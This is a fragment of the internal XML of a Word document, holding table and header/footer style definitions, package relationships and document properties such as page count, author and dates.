          <w:right w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="26"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="8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Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0066758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67584"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0066758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67584"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001A16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footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.pn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4C7D3A3-350E-4A9B-BF7C-00C8595E76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655</TotalTime>
  <Pages>40</Pages>
  <Words>7888</Words>
  <Characters>44967</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>374</Lines>
  <Paragraphs>105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Raj Bhatia</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Raj Bhatia</cp:lastModifiedBy>
  <cp:revision>48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-20T20:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T13:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>